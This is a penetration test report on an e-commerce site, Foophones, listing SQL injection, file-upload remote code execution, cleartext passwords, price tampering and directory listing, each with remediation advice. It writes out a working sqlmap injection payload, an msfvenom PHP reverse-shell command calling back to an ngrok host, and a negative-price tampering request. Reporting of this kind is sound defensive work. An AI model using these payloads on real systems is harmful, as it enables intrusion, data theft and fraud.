1. Executive Summary
The security assessment of the e-commerce website Foophones revealed multiple critical vulnerabilities that could be exploited by an attacker to gain unauthorized access, manipulate transactions, and execute remote code on the server. The identified issues include SQL Injection, Remote Code Execution (RCE), Broken Authentication, and Insecure Direct Object References (IDOR).
These vulnerabilities pose a severe risk to user data integrity, system security, and business operations. Immediate remediation is recommended.
2. Scope of Testing
Target: http://foophones.securitybrigade.com
Methodology: Manual and Automated Testing
Tools Used:
- SQLmap (SQL Injection)
- Burp Suite (Intercepting and Manipulating Requests)
- Metasploit (Reverse Shell, RCE)
- Dirb (Directory Enumeration)
- Nikto (Web Server Scanning)
- Nmap (Port Scanning)
- ngrok (Exposing Localhost for Reverse Shell)
3. Identified Vulnerabilities
3.1 SQL Injection in User Authentication
Affected Endpoint: /register.php (MULTIPART user parameter)
Vulnerability Type: Boolean-based and Time-based Blind SQL Injection
Exploited With:
sqlmap -u "http://foophones.securitybrigade.com/register.php" --data "user=sduni' AND (SELECT 9642 FROM (SELECT(SLEEP(5)))TNxX) AND 'YHHT'='YHHT" --dbs
Impact:
- Full database compromise
- Exfiltration of customer and order data
- Possible privilege escalation
Recommendation:
- Implement parameterized queries
- Sanitize and validate all user inputs
- Restrict database privileges
3.2 Remote Code Execution (RCE) via File Upload
Affected Endpoint: /register.php
Payload Used:
msfvenom -p php/meterpreter_reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=14727 -f raw -o shell.php
Attack Process:
- Uploaded shell.php via the file upload function
- Gained a reverse shell using Metasploit (reverse shell access obtained, allowing execution of system commands)
Impact:
- Full server compromise
- Data theft and modification
Recommendation:
- Restrict allowed file types
- Implement strong input validation
- Disable execution permissions in upload directories
3.3 Cleartext Password Submission
Affected Pages: /login.php, /register.php
Issue: User passwords are sent in plain text over HTTP
Impact:
- Passwords can be intercepted via MITM attacks
- User accounts are highly vulnerable to credential theft
Recommendation:
- Implement HTTPS with TLS 1.2+
- Encrypt passwords before transmission
- Use modern authentication protocols (OAuth, JWT, etc.)
3.4 Insecure Payment Manipulation
Affected Endpoint: /buy_confirm.php
Issue: The price parameter can be modified in the request
Payload Used:
POST /buy_confirm.php HTTP/1.1
Host: foophones.securitybrigade.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
shipping=ITM&price=-100000&id=1
Impact:
- Users can manipulate order values
- Negative prices result in a credit to user accounts
- Financial losses for the business
Recommendation:
- Implement server-side price validation
- Store prices securely on the server
- Use token-based request verification
3.5 Directory Listing Enabled
Affected Directories:
- /images/
- /include/
- /scripts/
Issue: Sensitive files can be accessed directly
Impact:
- Exposed internal scripts and configurations
- Potential for further exploitation
Recommendation:
- Disable directory listing in Apache/Nginx settings
- Use .htaccess to restrict access
3.6 CVSS Score Chart
4. Additional Findings
- No Web Application Firewall (WAF) detected
- No proper logging of unauthorized actions (Logs could be deleted manually)
- Server Information Disclosure via phpinfo.php
5. Recommended Mitigation Strategy
| Vulnerability | Recommended Fix | Priority |
|---|---|---|
| SQL Injection | Use parameterized queries, input validation | Critical |
| RCE via File Upload | Restrict file types, disable exec permissions | Critical |
| Cleartext Password Submission | Implement HTTPS, hash passwords | High |
| Payment Manipulation | Enforce server-side validation | High |
| Directory Listing Enabled | Disable indexing in server settings | Medium |
6. Conclusion
The assessment revealed multiple critical security flaws that could allow attackers to gain unauthorized access, manipulate transactions, and fully compromise the system. Immediate remediation is required.
Next Steps:
- Patch identified vulnerabilities immediately.
- Implement security best practices (WAF, logging, encryption).
- Conduct periodic security assessments and penetration testing.